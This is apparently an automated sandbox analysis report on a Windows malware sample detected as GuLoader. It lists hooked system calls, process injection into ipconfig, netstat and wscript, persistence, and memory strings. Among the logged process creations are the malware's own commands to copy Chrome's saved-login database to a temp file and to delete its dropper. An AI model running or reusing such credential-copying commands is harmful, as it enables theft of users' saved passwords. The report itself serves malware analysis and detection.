        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033934E0 NtCreateMutant,LdrInitializeThunk,28_2_033934E0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03394260 NtSetContextThread,28_2_03394260
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03394570 NtSuspendThread,28_2_03394570
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392B20 NtQueryInformationProcess,28_2_03392B20
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392BE0 NtQueryVirtualMemory,28_2_03392BE0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392A10 NtWriteFile,28_2_03392A10
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392AA0 NtQueryInformationFile,28_2_03392AA0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033929D0 NtWaitForSingleObject,28_2_033929D0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392F30 NtOpenDirectoryObject,28_2_03392F30
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392E00 NtQueueApcThread,28_2_03392E00
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392EB0 NtProtectVirtualMemory,28_2_03392EB0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392E80 NtCreateProcessEx,28_2_03392E80
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392ED0 NtResumeThread,28_2_03392ED0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392EC0 NtQuerySection,28_2_03392EC0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392D50 NtWriteVirtualMemory,28_2_03392D50
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392DA0 NtReadVirtualMemory,28_2_03392DA0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392C20 NtSetInformationFile,28_2_03392C20
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392C10 NtOpenProcess,28_2_03392C10
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392C50 NtUnmapViewOfSection,28_2_03392C50
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392CF0 NtDelayExecution,28_2_03392CF0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392CD0 NtEnumerateKey,28_2_03392CD0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033938D0 NtGetContextThread,28_2_033938D0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03393C30 NtOpenProcessToken,28_2_03393C30
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03393C90 NtOpenThread,28_2_03393C90
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_007E85E0 NtCreateFile,28_2_007E85E0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_007E8690 NtReadFile,28_2_007E8690
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_007E8710 NtClose,28_2_007E8710
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_007E87C0 NtAllocateVirtualMemory,28_2_007E87C0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_007E868D NtReadFile,28_2_007E868D
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_007E870A NtClose,28_2_007E870A
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_007E87C2 NtAllocateVirtualMemory,28_2_007E87C2
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52C30 NtMapViewOfSection,LdrInitializeThunk,29_2_04A52C30
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,29_2_04A52DC0
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52D10 NtQuerySystemInformation,LdrInitializeThunk,29_2_04A52D10
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52E50 NtCreateSection,LdrInitializeThunk,29_2_04A52E50
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52F00 NtCreateFile,LdrInitializeThunk,29_2_04A52F00
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A529F0 NtReadFile,LdrInitializeThunk,29_2_04A529F0
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52A80 NtClose,LdrInitializeThunk,29_2_04A52A80
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52AC0 NtEnumerateValueKey,LdrInitializeThunk,29_2_04A52AC0
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52B80 NtCreateKey,LdrInitializeThunk,29_2_04A52B80
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52B90 NtFreeVirtualMemory,LdrInitializeThunk,29_2_04A52B90
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52BC0 NtQueryInformationToken,LdrInitializeThunk,29_2_04A52BC0
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52B00 NtQueryValueKey,LdrInitializeThunk,29_2_04A52B00
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52B10 NtAllocateVirtualMemory,LdrInitializeThunk,29_2_04A52B10
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A534E0 NtCreateMutant,LdrInitializeThunk,29_2_04A534E0
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A54570 NtSuspendThread,29_2_04A54570
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A54260 NtSetContextThread,29_2_04A54260
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52CF0 NtDelayExecution,29_2_04A52CF0
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52CD0 NtEnumerateKey,29_2_04A52CD0
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52C20 NtSetInformationFile,29_2_04A52C20
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52C10 NtOpenProcess,29_2_04A52C10
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52C50 NtUnmapViewOfSection,29_2_04A52C50
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52DA0 NtReadVirtualMemory,29_2_04A52DA0
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52D50 NtWriteVirtualMemory,29_2_04A52D50
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52EB0 NtProtectVirtualMemory,29_2_04A52EB0
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52E80 NtCreateProcessEx,29_2_04A52E80
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52EC0 NtQuerySection,29_2_04A52EC0
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52ED0 NtResumeThread,29_2_04A52ED0
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52E00 NtQueueApcThread,29_2_04A52E00
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52FB0 NtSetValueKey,29_2_04A52FB0
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52F30 NtOpenDirectoryObject,29_2_04A52F30
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A529D0 NtWaitForSingleObject,29_2_04A529D0
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52AA0 NtQueryInformationFile,29_2_04A52AA0
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52A10 NtWriteFile,29_2_04A52A10
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52BE0 NtQueryVirtualMemory,29_2_04A52BE0
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A52B20 NtQueryInformationProcess,29_2_04A52B20
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A53C90 NtOpenThread,29_2_04A53C90
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A53C30 NtOpenProcessToken,29_2_04A53C30
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_04A538D0 NtGetContextThread,29_2_04A538D0
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_007385E0 NtCreateFile,29_2_007385E0
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_00738690 NtReadFile,29_2_00738690
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_00738710 NtClose,29_2_00738710
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_007387C0 NtAllocateVirtualMemory,29_2_007387C0
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_0073868D NtReadFile,29_2_0073868D
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_0073870A NtClose,29_2_0073870A
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 29_2_007387C2 NtAllocateVirtualMemory,29_2_007387C2
        Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess Stats: CPU usage > 98%
        Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 98%
        Source: C:\Windows\SysWOW64\wscript.exeProcess Stats: CPU usage > 98%
        Source: C:\Users\user\Desktop\BL_CI_PL.exeProcess Stats: CPU usage > 98%
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeProcess Stats: CPU usage > 98%
        Source: BL_CI_PL.exe, 00000001.00000002.25495730315.0000000000423000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamegadehan.exe vs BL_CI_PL.exe
        Source: BL_CI_PL.exe, 0000000A.00000000.25490034616.0000000000423000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamegadehan.exe vs BL_CI_PL.exe
        Source: BL_CI_PL.exe, 0000000A.00000003.26181548267.0000000000950000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameipconfig.exej% vs BL_CI_PL.exe
        Source: BL_CI_PL.exe, 0000000A.00000002.26187450455.00000000000D7000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameipconfig.exej% vs BL_CI_PL.exe
        Source: BL_CI_PL.exe, 0000000A.00000003.26181599405.00000000008DE000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameipconfig.exej% vs BL_CI_PL.exe
        Source: BL_CI_PL.exe, 0000000A.00000002.26203454530.000000001EB50000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs BL_CI_PL.exe
        Source: BL_CI_PL.exe, 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs BL_CI_PL.exe
        Source: BL_CI_PL.exeBinary or memory string: OriginalFilenamegadehan.exe vs BL_CI_PL.exe
        Source: BL_CI_PL.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: k4n8p7lb.exe.13.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: C:\Users\user\Desktop\BL_CI_PL.exeSection loaded: edgegdi.dll
        Source: C:\Users\user\Desktop\BL_CI_PL.exeSection loaded: edgegdi.dll
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: edgegdi.dll
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeSection loaded: edgegdi.dll
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeSection loaded: edgegdi.dll
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeSection loaded: edgegdi.dll
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeSection loaded: edgegdi.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edgegdi.dll
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeSection loaded: edgegdi.dll
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeSection loaded: edgegdi.dll
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeSection loaded: edgegdi.dll
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeSection loaded: edgegdi.dll
        Source: BL_CI_PL.exeVirustotal: Detection: 19%
        Source: BL_CI_PL.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\BL_CI_PL.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Users\user\Desktop\BL_CI_PL.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
        Source: unknownProcess created: C:\Users\user\Desktop\BL_CI_PL.exe "C:\Users\user\Desktop\BL_CI_PL.exe"
        Source: C:\Users\user\Desktop\BL_CI_PL.exeProcess created: C:\Users\user\Desktop\BL_CI_PL.exe "C:\Users\user\Desktop\BL_CI_PL.exe"
        Source: C:\Users\user\Desktop\BL_CI_PL.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\BL_CI_PL.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe "C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe"
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeProcess created: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeProcess created: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe "C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe"
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe "C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe"
        Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe "C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe"
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeProcess created: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe "C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe"
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeProcess created: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe "C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe"
        Source: C:\Users\user\Desktop\BL_CI_PL.exeProcess created: C:\Users\user\Desktop\BL_CI_PL.exe "C:\Users\user\Desktop\BL_CI_PL.exe"
        Source: C:\Users\user\Desktop\BL_CI_PL.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe "C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe"
        Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe "C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe"
        Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe "C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe"
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\BL_CI_PL.exe"
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeProcess created: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeProcess created: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe "C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe"
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeProcess created: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe "C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe"
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeProcess created: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe "C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe"
        Source: C:\Users\user\Desktop\BL_CI_PL.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
        Source: C:\Users\user\Desktop\BL_CI_PL.exe File created: C:\Users\user\AppData\Local\Temp\~DF3A772AC6F37DE022.TMP
        Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@31/7@62/20
        Source: C:\Windows\explorer.exe File read: C:\Users\desktop.ini
        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5780:120:WilError_03
        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:400:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:400:120:WilError_03
        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5780:304:WilStaging_02
        Source: Window Recorder Window detected: More than 3 window changes detected
        Source: C:\Windows\SysWOW64\ipconfig.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
        Source: Binary string: ipconfig.pdb source: BL_CI_PL.exe, 0000000A.00000002.26187395930.00000000000D0000.00000040.00020000.sdmp, BL_CI_PL.exe, 0000000A.00000003.26181599405.00000000008DE000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000003.26181490143.000000000094A000.00000004.00000001.sdmp
        Source: Binary string: ipconfig.pdbGCTL source: BL_CI_PL.exe, 0000000A.00000002.26187395930.00000000000D0000.00000040.00020000.sdmp, BL_CI_PL.exe, 0000000A.00000003.26181599405.00000000008DE000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000003.26181490143.000000000094A000.00000004.00000001.sdmp
        Source: Binary string: netstat.pdbGCTL source: k4n8p7lb.exe, 0000001A.00000003.29294254487.0000000000804000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000002.29298264719.0000000000090000.00000040.00020000.sdmp
        Source: Binary string: wscript.pdbGCTL source: k4n8p7lb.exe, 0000001B.00000003.29446027834.00000000007CC000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29464574091.000000001E820000.00000040.00020000.sdmp, k4n8p7lb.exe, 0000001B.00000003.29448067667.000000001E721000.00000004.00000001.sdmp
        Source: Binary string: netstat.pdb source: k4n8p7lb.exe, 0000001A.00000003.29294254487.0000000000804000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000002.29298264719.0000000000090000.00000040.00020000.sdmp
        Source: Binary string: wntdll.pdbUGP source: BL_CI_PL.exe, 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp, ipconfig.exe, 0000000E.00000002.30166829665.0000000003B0D000.00000040.00000001.sdmp, ipconfig.exe, 0000000E.00000002.30165083413.00000000039E0000.00000040.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, NETSTAT.EXE, 0000001C.00000002.30164124287.000000000344D000.00000040.00000001.sdmp, NETSTAT.EXE, 0000001C.00000003.29297520833.0000000002FC0000.00000004.00000001.sdmp, NETSTAT.EXE, 0000001C.00000002.30161938949.0000000003320000.00000040.00000001.sdmp, wscript.exe, 0000001D.00000002.30163629230.00000000049E0000.00000040.00000001.sdmp, wscript.exe, 0000001D.00000002.30165732579.0000000004B0D000.00000040.00000001.sdmp
        Source: Binary string: wntdll.pdb source: k4n8p7lb.exe, k4n8p7lb.exe, 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, NETSTAT.EXE, NETSTAT.EXE, 0000001C.00000002.30164124287.000000000344D000.00000040.00000001.sdmp, NETSTAT.EXE, 0000001C.00000003.29297520833.0000000002FC0000.00000004.00000001.sdmp, NETSTAT.EXE, 0000001C.00000002.30161938949.0000000003320000.00000040.00000001.sdmp, wscript.exe, wscript.exe, 0000001D.00000002.30163629230.00000000049E0000.00000040.00000001.sdmp, wscript.exe, 0000001D.00000002.30165732579.0000000004B0D000.00000040.00000001.sdmp
        Source: Binary string: wscript.pdb source: k4n8p7lb.exe, 0000001B.00000003.29446027834.00000000007CC000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29464574091.000000001E820000.00000040.00020000.sdmp, k4n8p7lb.exe, 0000001B.00000003.29448067667.000000001E721000.00000004.00000001.sdmp

        Data Obfuscation:

        Yara detected GuLoader
        Source: Yara match File source: 0000001F.00000002.30058808750.0000000002380000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match File source: 0000000A.00000000.25494294503.0000000000560000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match File source: 00000021.00000000.30054816737.0000000000560000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match File source: 00000020.00000002.30154748780.0000000000560000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match File source: 00000019.00000002.28964217531.0000000002BC0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match File source: 00000021.00000002.30154741238.0000000000560000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match File source: 0000001E.00000002.29975987031.0000000002C20000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match File source: 0000001B.00000000.28960622366.0000000000560000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match File source: 00000001.00000002.25496832496.0000000002B30000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match File source: 00000017.00000002.28872866748.0000000002A70000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match File source: 0000001A.00000000.28869456297.0000000000560000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match File source: 00000020.00000000.29972117697.0000000000560000.00000040.00000001.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\BL_CI_PL.exe Code function: 1_2_00406C65 push ds; iretd 1_2_00406C90
        Source: C:\Users\user\Desktop\BL_CI_PL.exe Code function: 1_2_0040A269 push 7816A1BAh; iretd 1_2_0040A281
        Source: C:\Users\user\Desktop\BL_CI_PL.exe Code function: 1_2_0040980A pushfd; ret 1_2_0040996E
        Source: C:\Users\user\Desktop\BL_CI_PL.exe Code function: 1_2_0040A22B push 7816A1BAh; iretd 1_2_0040A281
        Source: C:\Users\user\Desktop\BL_CI_PL.exe Code function: 1_2_00405B0A push ebx; iretd 1_2_00405B0B
        Source: C:\Users\user\Desktop\BL_CI_PL.exe Code function: 1_2_02B30085 push esp; iretd 1_2_02B30086
        Source: C:\Users\user\Desktop\BL_CI_PL.exe Code function: 1_2_02B300F2 push esp; iretd 1_2_02B300F3
        Source: C:\Users\user\Desktop\BL_CI_PL.exe Code function: 1_2_02B32CC9 push esi; ret 1_2_02B32CE8
        Source: C:\Users\user\Desktop\BL_CI_PL.exe Code function: 1_2_02B329F2 push eax; retf 1_2_02B329F4
        Source: C:\Users\user\Desktop\BL_CI_PL.exe Code function: 1_2_02B36BE7 push FFFFFF8Ah; retf 1_2_02B36C8D
        Source: C:\Users\user\Desktop\BL_CI_PL.exe Code function: 10_2_1E8B08CD push ecx; mov dword ptr [esp], ecx 10_2_1E8B08D6
        Source: C:\Users\user\Desktop\BL_CI_PL.exe Code function: 10_2_1E8897A1 push es; iretd 10_2_1E8897A8
        Source: C:\Users\user\Desktop\BL_CI_PL.exe Code function: 10_2_1E8821AD pushad; retf 0004h 10_2_1E88223F
        Source: C:\Users\user\Desktop\BL_CI_PL.exe Code function: 10_2_005741B6 push edi; retf 10_2_005741B8
        Source: C:\Users\user\Desktop\BL_CI_PL.exe Code function: 10_2_00574347 pushad; retf 10_2_00574348
        Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 14_2_039E21AD pushad; retf 0004h 14_2_039E223F
        Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 14_2_039E97A1 push es; iretd 14_2_039E97A8
        Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 14_2_03A108CD push ecx; mov dword ptr [esp], ecx 14_2_03A108D6
        Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 14_2_02F35640 push 6F0B6D34h; retf 14_2_02F35645
        Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 14_2_02F3B7D5 push eax; ret 14_2_02F3B828
        Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 14_2_02F3A7A6 push es; ret 14_2_02F3A757
        Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 14_2_02F35B77 push 6371F8CDh; retf 14_2_02F35B7C
        Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 14_2_02F35B58 push edx; iretd 14_2_02F35B64
        Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 14_2_02F3B88C push eax; ret 14_2_02F3B892
        Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 14_2_02F3B822 push eax; ret 14_2_02F3B828
        Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 14_2_02F3B82B push eax; ret 14_2_02F3B892
        Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 14_2_02F34E9C push 0D2B169Ah; retf 14_2_02F34EBD
        Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 14_2_02F3CCF6 push dword ptr [A92E284Ah]; ret 14_2_02F3CD17
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe Code function: 23_2_02A70085 push esp; iretd 23_2_02A70086
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe Code function: 23_2_02A700F2 push esp; iretd 23_2_02A700F3
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe Code function: 23_2_02A72CC9 push esi; ret 23_2_02A72CE8

        Persistence and Installation Behavior:

        Uses ipconfig to lookup or modify the Windows network settings
        Source: C:\Users\user\Desktop\BL_CI_PL.exe Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
        Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\T5jfdetbp\k4n8p7lb.exe
        Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 24_2_000002062223C4B2 GetPrivateProfileSectionNamesW,GetPrivateProfileStringW, 24_2_000002062223C4B2
